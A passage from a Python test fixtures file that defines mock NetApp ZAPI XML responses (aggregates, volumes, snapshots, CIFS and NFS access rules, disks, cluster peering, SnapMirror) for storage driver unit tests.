</aggr-snapshot-attributes>
<aggr-space-attributes>
<aggregate-metadata>425984</aggregate-metadata>
<hybrid-cache-size-total>0</hybrid-cache-size-total>
<percent-used-capacity>15</percent-used-capacity>
<size-available>6448431104</size-available>
<size-total>7549747200</size-total>
<size-used>1101316096</size-used>
<total-reserved-space>0</total-reserved-space>
<used-including-snapshot-reserve>1101316096</used-including-snapshot-reserve>
<volume-footprints>1100890112</volume-footprints>
</aggr-space-attributes>
<aggr-volume-count-attributes>
<flexvol-count>2</flexvol-count>
<flexvol-count-collective>0</flexvol-count-collective>
<flexvol-count-striped>0</flexvol-count-striped>
</aggr-volume-count-attributes>
<aggregate-name>%(aggr2)s</aggregate-name>
<aggregate-uuid>2a741934-1aaf-42dd-93ca-aaf231be108a</aggregate-uuid>
<nodes>
<node-name>cluster3-01</node-name>
</nodes>
<striping-type>not_striped</striping-type>
</aggr-attributes>
</attributes-list>
<num-records>2</num-records>
</results>
""" % {
'aggr1': SHARE_AGGREGATE_NAMES[0],
'aggr2': SHARE_AGGREGATE_NAMES[1],
})
AGGR_GET_ITER_SSC_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<aggr-attributes>
<aggr-64bit-upgrade-attributes>
<aggr-status-attributes>
<is-64-bit-upgrade-in-progress>false</is-64-bit-upgrade-in-progress>
</aggr-status-attributes>
</aggr-64bit-upgrade-attributes>
<aggr-fs-attributes>
<block-type>64_bit</block-type>
<fsid>1758646411</fsid>
<type>aggr</type>
</aggr-fs-attributes>
<aggr-inode-attributes>
<files-private-used>512</files-private-used>
<files-total>30384</files-total>
<files-used>96</files-used>
<inodefile-private-capacity>30384</inodefile-private-capacity>
<inodefile-public-capacity>30384</inodefile-public-capacity>
<maxfiles-available>30384</maxfiles-available>
<maxfiles-possible>243191</maxfiles-possible>
<maxfiles-used>96</maxfiles-used>
<percent-inode-used-capacity>0</percent-inode-used-capacity>
</aggr-inode-attributes>
<aggr-ownership-attributes>
<home-id>4082368507</home-id>
<home-name>cluster3-01</home-name>
<owner-id>4082368507</owner-id>
<owner-name>cluster3-01</owner-name>
</aggr-ownership-attributes>
<aggr-performance-attributes>
<free-space-realloc>off</free-space-realloc>
<max-write-alloc-blocks>0</max-write-alloc-blocks>
</aggr-performance-attributes>
<aggr-raid-attributes>
<checksum-status>active</checksum-status>
<checksum-style>block</checksum-style>
<disk-count>3</disk-count>
<ha-policy>cfo</ha-policy>
<has-local-root>true</has-local-root>
<has-partner-root>false</has-partner-root>
<is-checksum-enabled>true</is-checksum-enabled>
<is-hybrid>false</is-hybrid>
<is-hybrid-enabled>false</is-hybrid-enabled>
<is-inconsistent>false</is-inconsistent>
<mirror-status>unmirrored</mirror-status>
<mount-state>online</mount-state>
<plex-count>1</plex-count>
<plexes>
<plex-attributes>
<is-online>true</is-online>
<is-resyncing>false</is-resyncing>
<plex-name>/%(aggr1)s/plex0</plex-name>
<plex-status>normal,active</plex-status>
<raidgroups>
<raidgroup-attributes>
<checksum-style>block</checksum-style>
<is-cache-tier>false</is-cache-tier>
<is-recomputing-parity>false</is-recomputing-parity>
<is-reconstructing>false</is-reconstructing>
<raidgroup-name>/%(aggr1)s/plex0/rg0</raidgroup-name>
<recomputing-parity-percentage>0</recomputing-parity-percentage>
<reconstruction-percentage>0</reconstruction-percentage>
</raidgroup-attributes>
</raidgroups>
<resyncing-percentage>0</resyncing-percentage>
</plex-attributes>
</plexes>
<raid-lost-write-state>on</raid-lost-write-state>
<raid-size>16</raid-size>
<raid-status>raid_dp, normal</raid-status>
<raid-type>raid_dp</raid-type>
<state>online</state>
</aggr-raid-attributes>
<aggr-snaplock-attributes>
<is-snaplock>false</is-snaplock>
</aggr-snaplock-attributes>
<aggr-snapshot-attributes>
<files-total>0</files-total>
<files-used>0</files-used>
<is-snapshot-auto-create-enabled>true</is-snapshot-auto-create-enabled>
<is-snapshot-auto-delete-enabled>true</is-snapshot-auto-delete-enabled>
<maxfiles-available>0</maxfiles-available>
<maxfiles-possible>0</maxfiles-possible>
<maxfiles-used>0</maxfiles-used>
<percent-inode-used-capacity>0</percent-inode-used-capacity>
<percent-used-capacity>0</percent-used-capacity>
<size-available>0</size-available>
<size-total>0</size-total>
<size-used>0</size-used>
<snapshot-reserve-percent>0</snapshot-reserve-percent>
</aggr-snapshot-attributes>
<aggr-space-attributes>
<aggregate-metadata>245760</aggregate-metadata>
<hybrid-cache-size-total>0</hybrid-cache-size-total>
<percent-used-capacity>95</percent-used-capacity>
<size-available>45670400</size-available>
<size-total>943718400</size-total>
<size-used>898048000</size-used>
<total-reserved-space>0</total-reserved-space>
<used-including-snapshot-reserve>898048000</used-including-snapshot-reserve>
<volume-footprints>897802240</volume-footprints>
</aggr-space-attributes>
<aggr-volume-count-attributes>
<flexvol-count>1</flexvol-count>
<flexvol-count-collective>0</flexvol-count-collective>
<flexvol-count-striped>0</flexvol-count-striped>
</aggr-volume-count-attributes>
<aggregate-name>%(aggr1)s</aggregate-name>
<aggregate-uuid>15863632-ea49-49a8-9c88-2bd2d57c6d7a</aggregate-uuid>
<nodes>
<node-name>cluster3-01</node-name>
</nodes>
<striping-type>unknown</striping-type>
</aggr-attributes>
</attributes-list>
<num-records>1</num-records>
</results>
""" % {'aggr1': SHARE_AGGREGATE_NAMES[0]})
AGGR_GET_ITER_ROOT_AGGR_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<aggr-attributes>
<aggr-raid-attributes>
<has-local-root>true</has-local-root>
<has-partner-root>false</has-partner-root>
</aggr-raid-attributes>
<aggregate-name>%(root1)s</aggregate-name>
</aggr-attributes>
<aggr-attributes>
<aggr-raid-attributes>
<has-local-root>true</has-local-root>
<has-partner-root>false</has-partner-root>
</aggr-raid-attributes>
<aggregate-name>%(root2)s</aggregate-name>
</aggr-attributes>
<aggr-attributes>
<aggr-raid-attributes>
<has-local-root>false</has-local-root>
<has-partner-root>false</has-partner-root>
</aggr-raid-attributes>
<aggregate-name>%(aggr1)s</aggregate-name>
</aggr-attributes>
<aggr-attributes>
<aggr-raid-attributes>
<has-local-root>false</has-local-root>
<has-partner-root>false</has-partner-root>
</aggr-raid-attributes>
<aggregate-name>%(aggr2)s</aggregate-name>
</aggr-attributes>
</attributes-list>
<num-records>6</num-records>
</results>
""" % {
'root1': ROOT_AGGREGATE_NAMES[0],
'root2': ROOT_AGGREGATE_NAMES[1],
'aggr1': SHARE_AGGREGATE_NAMES[0],
'aggr2': SHARE_AGGREGATE_NAMES[1],
})
AGGR_GET_ITER_NON_ROOT_AGGR_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<aggr-attributes>
<aggr-raid-attributes>
<has-local-root>false</has-local-root>
<has-partner-root>false</has-partner-root>
</aggr-raid-attributes>
<aggregate-name>%(aggr1)s</aggregate-name>
</aggr-attributes>
<aggr-attributes>
<aggr-raid-attributes>
<has-local-root>false</has-local-root>
<has-partner-root>false</has-partner-root>
</aggr-raid-attributes>
<aggregate-name>%(aggr2)s</aggregate-name>
</aggr-attributes>
</attributes-list>
<num-records>6</num-records>
</results>
""" % {
'aggr1': SHARE_AGGREGATE_NAMES[0],
'aggr2': SHARE_AGGREGATE_NAMES[1],
})
VOLUME_GET_NAME_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<volume-attributes>
<volume-id-attributes>
<name>%(volume)s</name>
<owning-vserver-name>%(vserver)s</owning-vserver-name>
</volume-id-attributes>
</volume-attributes>
</attributes-list>
<num-records>1</num-records>
</results>
""" % {'volume': SHARE_NAME, 'vserver': VSERVER_NAME})
VOLUME_GET_VOLUME_PATH_RESPONSE = etree.XML("""
<results status="passed">
<junction>/%(volume)s</junction>
</results>
""" % {'volume': SHARE_NAME})
VOLUME_GET_VOLUME_PATH_CIFS_RESPONSE = etree.XML("""
<results status="passed">
<junction>\\%(volume)s</junction>
</results>
""" % {'volume': SHARE_NAME})
VOLUME_JUNCTION_PATH = '/' + SHARE_NAME
VOLUME_JUNCTION_PATH_CIFS = '\\' + SHARE_NAME
VOLUME_MODIFY_ITER_RESPONSE = etree.XML("""
<results status="passed">
<failure-list />
<num-failed>0</num-failed>
<num-succeeded>1</num-succeeded>
<success-list>
<volume-modify-iter-info>
<volume-key>
<volume-attributes>
<volume-id-attributes>
<name>%(volume)s</name>
<owning-vserver-name>%(vserver)s</owning-vserver-name>
</volume-id-attributes>
</volume-attributes>
</volume-key>
</volume-modify-iter-info>
</success-list>
</results>
""" % {'volume': SHARE_NAME, 'vserver': VSERVER_NAME})
VOLUME_MODIFY_ITER_ERROR_RESPONSE = etree.XML("""
<results status="passed">
<failure-list>
<volume-modify-iter-info>
<error-code>160</error-code>
<error-message>Unable to set volume attribute "size"</error-message>
<volume-key>
<volume-attributes>
<volume-id-attributes>
<name>%(volume)s</name>
<owning-vserver-name>%(vserver)s</owning-vserver-name>
</volume-id-attributes>
</volume-attributes>
</volume-key>
</volume-modify-iter-info>
</failure-list>
<num-failed>1</num-failed>
<num-succeeded>0</num-succeeded>
</results>
""" % {'volume': SHARE_NAME, 'vserver': VSERVER_NAME})
SNAPSHOT_ACCESS_TIME = '1466640058'
SNAPSHOT_GET_ITER_NOT_BUSY_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<snapshot-info>
<access-time>%(access_time)s</access-time>
<busy>false</busy>
<name>%(snap)s</name>
<volume>%(volume)s</volume>
<vserver>%(vserver)s</vserver>
</snapshot-info>
</attributes-list>
<num-records>1</num-records>
</results>
""" % {
'access_time': SNAPSHOT_ACCESS_TIME,
'snap': SNAPSHOT_NAME,
'volume': SHARE_NAME,
'vserver': VSERVER_NAME,
})
SNAPSHOT_GET_ITER_BUSY_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<snapshot-info>
<access-time>%(access_time)s</access-time>
<busy>true</busy>
<name>%(snap)s</name>
<volume>%(volume)s</volume>
<vserver>%(vserver)s</vserver>
<snapshot-owners-list>
<snapshot-owner>
<owner>volume clone</owner>
</snapshot-owner>
</snapshot-owners-list>
</snapshot-info>
</attributes-list>
<num-records>1</num-records>
</results>
""" % {
'access_time': SNAPSHOT_ACCESS_TIME,
'snap': SNAPSHOT_NAME,
'volume': SHARE_NAME,
'vserver': VSERVER_NAME,
})
SNAPSHOT_GET_ITER_NOT_UNIQUE_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<snapshot-info>
<busy>false</busy>
<name>%(snap)s</name>
<volume>%(volume)s</volume>
<vserver>%(vserver)s</vserver>
</snapshot-info>
<snapshot-info>
<busy>false</busy>
<name>%(snap)s</name>
<volume>%(root_volume)s</volume>
<vserver>%(admin_vserver)s</vserver>
</snapshot-info>
</attributes-list>
<num-records>1</num-records>
</results>
""" % {
'snap': SNAPSHOT_NAME,
'volume': SHARE_NAME,
'vserver': VSERVER_NAME,
'root_volume': ROOT_VOLUME_NAME,
'admin_vserver': ADMIN_VSERVER_NAME,
})
SNAPSHOT_GET_ITER_UNAVAILABLE_RESPONSE = etree.XML("""
<results status="passed">
<num-records>0</num-records>
<volume-errors>
<volume-error>
<errno>13023</errno>
<name>%(volume)s</name>
<reason>Unable to get information for Snapshot copies of volume \
"%(volume)s" on Vserver "%(vserver)s". Reason: Volume not online.</reason>
<vserver>%(vserver)s</vserver>
</volume-error>
</volume-errors>
</results>
""" % {'volume': SHARE_NAME, 'vserver': VSERVER_NAME})
SNAPSHOT_GET_ITER_OTHER_ERROR_RESPONSE = etree.XML("""
<results status="passed">
<num-records>0</num-records>
<volume-errors>
<volume-error>
<errno>99999</errno>
<name>%(volume)s</name>
<reason>Unable to get information for Snapshot copies of volume \
"%(volume)s" on Vserver "%(vserver)s".</reason>
<vserver>%(vserver)s</vserver>
</volume-error>
</volume-errors>
</results>
""" % {'volume': SHARE_NAME, 'vserver': VSERVER_NAME})
SNAPSHOT_MULTIDELETE_ERROR_RESPONSE = etree.XML("""
<results status="passed">
<volume-errors>
<volume-error>
<errno>13021</errno>
<name>%(volume)s</name>
<reason>No such snapshot.</reason>
</volume-error>
</volume-errors>
</results>
""" % {'volume': SHARE_NAME})
SNAPSHOT_GET_ITER_DELETED_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<snapshot-info>
<name>deleted_manila_%(snap)s</name>
<volume>%(volume)s</volume>
<vserver>%(vserver)s</vserver>
</snapshot-info>
</attributes-list>
<num-records>1</num-records>
</results>
""" % {
'snap': SNAPSHOT_NAME,
'volume': SHARE_NAME,
'vserver': VSERVER_NAME,
})
SNAPSHOT_GET_ITER_SNAPMIRROR_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<snapshot-info>
<name>%(snap)s</name>
<volume>%(volume)s</volume>
<vserver>%(vserver)s</vserver>
</snapshot-info>
</attributes-list>
<num-records>1</num-records>
</results>
""" % {
'snap': SNAPSHOT_NAME,
'volume': SHARE_NAME,
'vserver': VSERVER_NAME,
})
CIFS_SHARE_ACCESS_CONTROL_GET_ITER = etree.XML("""
<results status="passed">
<attributes-list>
<cifs-share-access-control>
<permission>full_control</permission>
<share>%(volume)s</share>
<user-or-group>Administrator</user-or-group>
<vserver>manila_svm_cifs</vserver>
</cifs-share-access-control>
<cifs-share-access-control>
<permission>change</permission>
<share>%(volume)s</share>
<user-or-group>Administrators</user-or-group>
<vserver>manila_svm_cifs</vserver>
</cifs-share-access-control>
<cifs-share-access-control>
<permission>read</permission>
<share>%(volume)s</share>
<user-or-group>Power Users</user-or-group>
<vserver>manila_svm_cifs</vserver>
</cifs-share-access-control>
<cifs-share-access-control>
<permission>no_access</permission>
<share>%(volume)s</share>
<user-or-group>Users</user-or-group>
<vserver>manila_svm_cifs</vserver>
</cifs-share-access-control>
</attributes-list>
<num-records>4</num-records>
</results>
""" % {'volume': SHARE_NAME})
NFS_EXPORT_RULES = ('10.10.10.10', '10.10.10.20')
NFS_EXPORTFS_LIST_RULES_2_NO_RULES_RESPONSE = etree.XML("""
<results status="passed">
<rules />
</results>
""")
NFS_EXPORTFS_LIST_RULES_2_RESPONSE = etree.XML("""
<results status="passed">
<rules>
<exports-rule-info-2>
<pathname>%(path)s</pathname>
<security-rules>
<security-rule-info>
<anon>65534</anon>
<nosuid>false</nosuid>
<read-only>
<exports-hostname-info>
<name>%(host1)s</name>
</exports-hostname-info>
<exports-hostname-info>
<name>%(host2)s</name>
</exports-hostname-info>
</read-only>
<read-write>
<exports-hostname-info>
<name>%(host1)s</name>
</exports-hostname-info>
<exports-hostname-info>
<name>%(host2)s</name>
</exports-hostname-info>
</read-write>
<root>
<exports-hostname-info>
<name>%(host1)s</name>
</exports-hostname-info>
<exports-hostname-info>
<name>%(host2)s</name>
</exports-hostname-info>
</root>
<sec-flavor>
<sec-flavor-info>
<flavor>sys</flavor>
</sec-flavor-info>
</sec-flavor>
</security-rule-info>
</security-rules>
</exports-rule-info-2>
</rules>
</results>
""" % {
'path': VOLUME_JUNCTION_PATH,
'host1': NFS_EXPORT_RULES[0],
'host2': NFS_EXPORT_RULES[1],
})
AGGR_GET_RAID_TYPE_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<aggr-attributes>
<aggr-raid-attributes>
<plexes>
<plex-attributes>
<plex-name>/%(aggr1)s/plex0</plex-name>
<raidgroups>
<raidgroup-attributes>
<raidgroup-name>/%(aggr1)s/plex0/rg0</raidgroup-name>
</raidgroup-attributes>
</raidgroups>
</plex-attributes>
</plexes>
<raid-type>%(raid_type1)s</raid-type>
</aggr-raid-attributes>
<aggregate-name>%(aggr1)s</aggregate-name>
</aggr-attributes>
<aggr-attributes>
<aggr-raid-attributes>
<plexes>
<plex-attributes>
<plex-name>/%(aggr2)s/plex0</plex-name>
<raidgroups>
<raidgroup-attributes>
<raidgroup-name>/%(aggr2)s/plex0/rg0</raidgroup-name>
</raidgroup-attributes>
<raidgroup-attributes>
<raidgroup-name>/%(aggr2)s/plex0/rg1</raidgroup-name>
</raidgroup-attributes>
</raidgroups>
</plex-attributes>
</plexes>
<raid-type>%(raid_type2)s</raid-type>
</aggr-raid-attributes>
<aggregate-name>%(aggr2)s</aggregate-name>
</aggr-attributes>
</attributes-list>
<num-records>2</num-records>
</results>
""" % {
'aggr1': SHARE_AGGREGATE_NAMES[0],
'aggr2': SHARE_AGGREGATE_NAMES[1],
'raid_type1': SHARE_AGGREGATE_RAID_TYPES[0],
'raid_type2': SHARE_AGGREGATE_RAID_TYPES[1]
})
STORAGE_DISK_GET_ITER_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<storage-disk-info>
<disk-name>cluster3-01:v5.19</disk-name>
<disk-raid-info>
<effective-disk-type>%(type0)s</effective-disk-type>
</disk-raid-info>
</storage-disk-info>
<storage-disk-info>
<disk-name>cluster3-01:v5.20</disk-name>
<disk-raid-info>
<effective-disk-type>%(type0)s</effective-disk-type>
</disk-raid-info>
</storage-disk-info>
<storage-disk-info>
<disk-name>cluster3-01:v5.20</disk-name>
<disk-raid-info>
<effective-disk-type>%(type1)s</effective-disk-type>
</disk-raid-info>
</storage-disk-info>
<storage-disk-info>
<disk-name>cluster3-01:v5.20</disk-name>
<disk-raid-info>
<effective-disk-type>%(type1)s</effective-disk-type>
</disk-raid-info>
</storage-disk-info>
</attributes-list>
<num-records>4</num-records>
</results>
""" % {
'type0': SHARE_AGGREGATE_DISK_TYPES[0],
'type1': SHARE_AGGREGATE_DISK_TYPES[1],
})
STORAGE_DISK_GET_ITER_RESPONSE_PAGE_1 = etree.XML("""
<results status="passed">
<attributes-list>
<storage-disk-info>
<disk-name>cluster3-01:v4.16</disk-name>
</storage-disk-info>
<storage-disk-info>
<disk-name>cluster3-01:v4.17</disk-name>
</storage-disk-info>
<storage-disk-info>
<disk-name>cluster3-01:v4.18</disk-name>
</storage-disk-info>
<storage-disk-info>
<disk-name>cluster3-01:v4.19</disk-name>
</storage-disk-info>
<storage-disk-info>
<disk-name>cluster3-01:v4.20</disk-name>
</storage-disk-info>
<storage-disk-info>
<disk-name>cluster3-01:v4.21</disk-name>
</storage-disk-info>
<storage-disk-info>
<disk-name>cluster3-01:v4.22</disk-name>
</storage-disk-info>
<storage-disk-info>
<disk-name>cluster3-01:v4.24</disk-name>
</storage-disk-info>
<storage-disk-info>
<disk-name>cluster3-01:v4.25</disk-name>
</storage-disk-info>
<storage-disk-info>
<disk-name>cluster3-01:v4.26</disk-name>
</storage-disk-info>
</attributes-list>
<next-tag>next_tag_1</next-tag>
<num-records>10</num-records>
</results>
""")
STORAGE_DISK_GET_ITER_RESPONSE_PAGE_2 = etree.XML("""
<results status="passed">
<attributes-list>
<storage-disk-info>
<disk-name>cluster3-01:v4.27</disk-name>
</storage-disk-info>
<storage-disk-info>
<disk-name>cluster3-01:v4.28</disk-name>
</storage-disk-info>
<storage-disk-info>
<disk-name>cluster3-01:v4.29</disk-name>
</storage-disk-info>
<storage-disk-info>
<disk-name>cluster3-01:v4.32</disk-name>
</storage-disk-info>
<storage-disk-info>
<disk-name>cluster3-01:v5.16</disk-name>
</storage-disk-info>
<storage-disk-info>
<disk-name>cluster3-01:v5.17</disk-name>
</storage-disk-info>
<storage-disk-info>
<disk-name>cluster3-01:v5.18</disk-name>
</storage-disk-info>
<storage-disk-info>
<disk-name>cluster3-01:v5.19</disk-name>
</storage-disk-info>
<storage-disk-info>
<disk-name>cluster3-01:v5.20</disk-name>
</storage-disk-info>
<storage-disk-info>
<disk-name>cluster3-01:v5.21</disk-name>
</storage-disk-info>
</attributes-list>
<next-tag>next_tag_2</next-tag>
<num-records>10</num-records>
</results>
""")
STORAGE_DISK_GET_ITER_RESPONSE_PAGE_3 = etree.XML("""
<results status="passed">
<attributes-list>
<storage-disk-info>
<disk-name>cluster3-01:v5.22</disk-name>
</storage-disk-info>
<storage-disk-info>
<disk-name>cluster3-01:v5.24</disk-name>
</storage-disk-info>
<storage-disk-info>
<disk-name>cluster3-01:v5.25</disk-name>
</storage-disk-info>
<storage-disk-info>
<disk-name>cluster3-01:v5.26</disk-name>
</storage-disk-info>
<storage-disk-info>
<disk-name>cluster3-01:v5.27</disk-name>
</storage-disk-info>
<storage-disk-info>
<disk-name>cluster3-01:v5.28</disk-name>
</storage-disk-info>
<storage-disk-info>
<disk-name>cluster3-01:v5.29</disk-name>
</storage-disk-info>
<storage-disk-info>
<disk-name>cluster3-01:v5.32</disk-name>
</storage-disk-info>
</attributes-list>
<num-records>8</num-records>
</results>
""")
GET_AGGREGATE_FOR_VOLUME_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<volume-attributes>
<volume-id-attributes>
<containing-aggregate-name>%(aggr)s</containing-aggregate-name>
<name>%(share)s</name>
<owning-vserver-name>os_aa666789-5576-4835-87b7-868069856459</owning-vserver-name>
</volume-id-attributes>
</volume-attributes>
</attributes-list>
<num-records>1</num-records>
</results>
""" % {
'aggr': SHARE_AGGREGATE_NAME,
'share': SHARE_NAME
})
GET_VOLUME_FOR_ENCRYPTED_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<volume-attributes>
<encrypt>true</encrypt>
<volume-id-attributes>
<name>%(volume)s</name>
<owning-vserver-name>manila_svm</owning-vserver-name>
</volume-id-attributes>
</volume-attributes>
</attributes-list>
<num-records>1</num-records>
</results>
""" % {'volume': SHARE_NAME})
GET_VOLUME_FOR_ENCRYPTED_OLD_SYS_VERSION_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<volume-attributes>
<volume-id-attributes>
<name>%(volume)s</name>
<owning-vserver-name>manila_svm</owning-vserver-name>
</volume-id-attributes>
</volume-attributes>
</attributes-list>
<num-records>1</num-records>
</results>
""" % {'volume': SHARE_NAME})
EXPORT_RULE_GET_ITER_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<export-rule-info>
<client-match>%(rule)s</client-match>
<policy-name>%(policy)s</policy-name>
<rule-index>3</rule-index>
<vserver-name>manila_svm</vserver-name>
</export-rule-info>
<export-rule-info>
<client-match>%(rule)s</client-match>
<policy-name>%(policy)s</policy-name>
<rule-index>1</rule-index>
<vserver-name>manila_svm</vserver-name>
</export-rule-info>
</attributes-list>
<num-records>2</num-records>
</results>
""" % {'policy': EXPORT_POLICY_NAME, 'rule': IP_ADDRESS})
VOLUME_GET_EXPORT_POLICY_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<volume-attributes>
<volume-export-attributes>
<policy>%(policy)s</policy>
</volume-export-attributes>
<volume-id-attributes>
<name>%(volume)s</name>
<owning-vserver-name>manila_svm</owning-vserver-name>
</volume-id-attributes>
</volume-attributes>
</attributes-list>
<num-records>1</num-records>
</results>
""" % {'policy': EXPORT_POLICY_NAME, 'volume': SHARE_NAME})
DELETED_EXPORT_POLICY_GET_ITER_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<export-policy-info>
<policy-name>%(policy1)s</policy-name>
<vserver>%(vserver)s</vserver>
</export-policy-info>
<export-policy-info>
<policy-name>%(policy2)s</policy-name>
<vserver>%(vserver)s</vserver>
</export-policy-info>
<export-policy-info>
<policy-name>%(policy3)s</policy-name>
<vserver>%(vserver2)s</vserver>
</export-policy-info>
</attributes-list>
<num-records>2</num-records>
</results>
""" % {
'vserver': VSERVER_NAME,
'vserver2': VSERVER_NAME_2,
'policy1': DELETED_EXPORT_POLICIES[VSERVER_NAME][0],
'policy2': DELETED_EXPORT_POLICIES[VSERVER_NAME][1],
'policy3': DELETED_EXPORT_POLICIES[VSERVER_NAME_2][0],
})
LUN_GET_ITER_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<lun-info>
<path>/vol/%(volume)s/fakelun</path>
<qtree />
<volume>%(volume)s</volume>
<vserver>%(vserver)s</vserver>
</lun-info>
</attributes-list>
<num-records>1</num-records>
</results>
""" % {
'vserver': VSERVER_NAME,
'volume': SHARE_NAME,
})
VOLUME_GET_ITER_NOT_UNIQUE_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<volume-attributes>
<volume-id-attributes>
<name>%(volume1)s</name>
</volume-id-attributes>
</volume-attributes>
<volume-attributes>
<volume-id-attributes>
<name>%(volume2)s</name>
</volume-id-attributes>
</volume-attributes>
</attributes-list>
<num-records>2</num-records>
</results>
""" % {
'volume1': SHARE_NAME,
'volume2': SHARE_NAME_2,
})
VOLUME_GET_ITER_JUNCTIONED_VOLUMES_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<volume-attributes>
<volume-id-attributes>
<name>fake_volume</name>
<owning-vserver-name>test</owning-vserver-name>
</volume-id-attributes>
</volume-attributes>
</attributes-list>
<num-records>1</num-records>
</results>
""")
VOLUME_GET_ITER_VOLUME_TO_MANAGE_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<volume-attributes>
<volume-id-attributes>
<containing-aggregate-name>%(aggr)s</containing-aggregate-name>
<junction-path>/%(volume)s</junction-path>
<name>%(volume)s</name>
<owning-vserver-name>%(vserver)s</owning-vserver-name>
<style>flex</style>
<type>rw</type>
</volume-id-attributes>
<volume-space-attributes>
<size>%(size)s</size>
</volume-space-attributes>
<volume-qos-attributes>
<policy-group-name>%(qos-policy-group-name)s</policy-group-name>
</volume-qos-attributes>
</volume-attributes>
</attributes-list>
<num-records>1</num-records>
</results>
""" % {
'aggr': SHARE_AGGREGATE_NAME,
'vserver': VSERVER_NAME,
'volume': SHARE_NAME,
'size': SHARE_SIZE,
'qos-policy-group-name': QOS_POLICY_GROUP_NAME,
})
VOLUME_GET_ITER_NO_QOS_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<volume-attributes>
<volume-id-attributes>
<containing-aggregate-name>%(aggr)s</containing-aggregate-name>
<junction-path>/%(volume)s</junction-path>
<name>%(volume)s</name>
<owning-vserver-name>%(vserver)s</owning-vserver-name>
<style>flex</style>
<type>rw</type>
</volume-id-attributes>
<volume-space-attributes>
<size>%(size)s</size>
</volume-space-attributes>
</volume-attributes>
</attributes-list>
<num-records>1</num-records>
</results>
""" % {
'aggr': SHARE_AGGREGATE_NAME,
'vserver': VSERVER_NAME,
'volume': SHARE_NAME,
'size': SHARE_SIZE,
})
CLONE_CHILD_1 = 'fake_child_1'
CLONE_CHILD_2 = 'fake_child_2'
VOLUME_GET_ITER_CLONE_CHILDREN_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<volume-attributes>
<volume-id-attributes>
<name>%(clone1)s</name>
<owning-vserver-name>%(vserver)s</owning-vserver-name>
</volume-id-attributes>
</volume-attributes>
<volume-attributes>
<volume-id-attributes>
<name>%(clone2)s</name>
<owning-vserver-name>%(vserver)s</owning-vserver-name>
</volume-id-attributes>
</volume-attributes>
</attributes-list>
<num-records>2</num-records>
</results>
""" % {
'vserver': VSERVER_NAME,
'clone1': CLONE_CHILD_1,
'clone2': CLONE_CHILD_2,
})
SIS_GET_ITER_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<sis-status-info>
<is-compression-enabled>true</is-compression-enabled>
<path>/vol/%(volume)s</path>
<state>enabled</state>
<vserver>%(vserver)s</vserver>
</sis-status-info>
</attributes-list>
</results>
""" % {
'vserver': VSERVER_NAME,
'volume': SHARE_NAME,
})
CLUSTER_PEER_GET_ITER_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<cluster-peer-info>
<active-addresses>
<remote-inet-address>%(addr1)s</remote-inet-address>
<remote-inet-address>%(addr2)s</remote-inet-address>
</active-addresses>
<availability>available</availability>
<cluster-name>%(cluster)s</cluster-name>
<cluster-uuid>fake_uuid</cluster-uuid>
<peer-addresses>
<remote-inet-address>%(addr1)s</remote-inet-address>
</peer-addresses>
<remote-cluster-name>%(remote_cluster)s</remote-cluster-name>
<serial-number>fake_serial_number</serial-number>
<timeout>60</timeout>
</cluster-peer-info>
</attributes-list>
<num-records>1</num-records>
</results>
""" % {
'addr1': CLUSTER_ADDRESS_1,
'addr2': CLUSTER_ADDRESS_2,
'cluster': CLUSTER_NAME,
'remote_cluster': REMOTE_CLUSTER_NAME,
})
CLUSTER_PEER_POLICY_GET_RESPONSE = etree.XML("""
<results status="passed">
<attributes>
<cluster-peer-policy>
<is-unauthenticated-access-permitted>false</is-unauthenticated-access-permitted>
<passphrase-minimum-length>8</passphrase-minimum-length>
</cluster-peer-policy>
</attributes>
</results>
""")
VSERVER_PEER_GET_ITER_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<vserver-peer-info>
<applications>
<vserver-peer-application>snapmirror</vserver-peer-application>
</applications>
<peer-cluster>%(cluster)s</peer-cluster>
<peer-state>peered</peer-state>
<peer-vserver>%(vserver2)s</peer-vserver>
<vserver>%(vserver1)s</vserver>
</vserver-peer-info>
</attributes-list>
<num-records>2</num-records>
</results>
""" % {
'cluster': CLUSTER_NAME,
'vserver1': VSERVER_NAME,
'vserver2': VSERVER_NAME_2
})
SNAPMIRROR_GET_ITER_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<snapmirror-info>
<destination-volume>fake_destination_volume</destination-volume>
<destination-volume-node>fake_destination_node</destination-volume-node>
<destination-vserver>fake_destination_vserver</destination-vserver>
<exported-snapshot>fake_snapshot</exported-snapshot>
<exported-snapshot-timestamp>1442701782</exported-snapshot-timestamp>
<is-constituent>false</is-constituent>
<is-healthy>true</is-healthy>
<lag-time>2187</lag-time>
<last-transfer-duration>109</last-transfer-duration>
<last-transfer-end-timestamp>1442701890</last-transfer-end-timestamp>
<last-transfer-from>test:manila</last-transfer-from>
<last-transfer-size>1171456</last-transfer-size>
<last-transfer-type>initialize</last-transfer-type>
<max-transfer-rate>0</max-transfer-rate>
<mirror-state>snapmirrored</mirror-state>
<newest-snapshot>fake_snapshot</newest-snapshot>
<newest-snapshot-timestamp>1442701782</newest-snapshot-timestamp>
<policy>DPDefault</policy>
<relationship-control-plane>v2</relationship-control-plane>
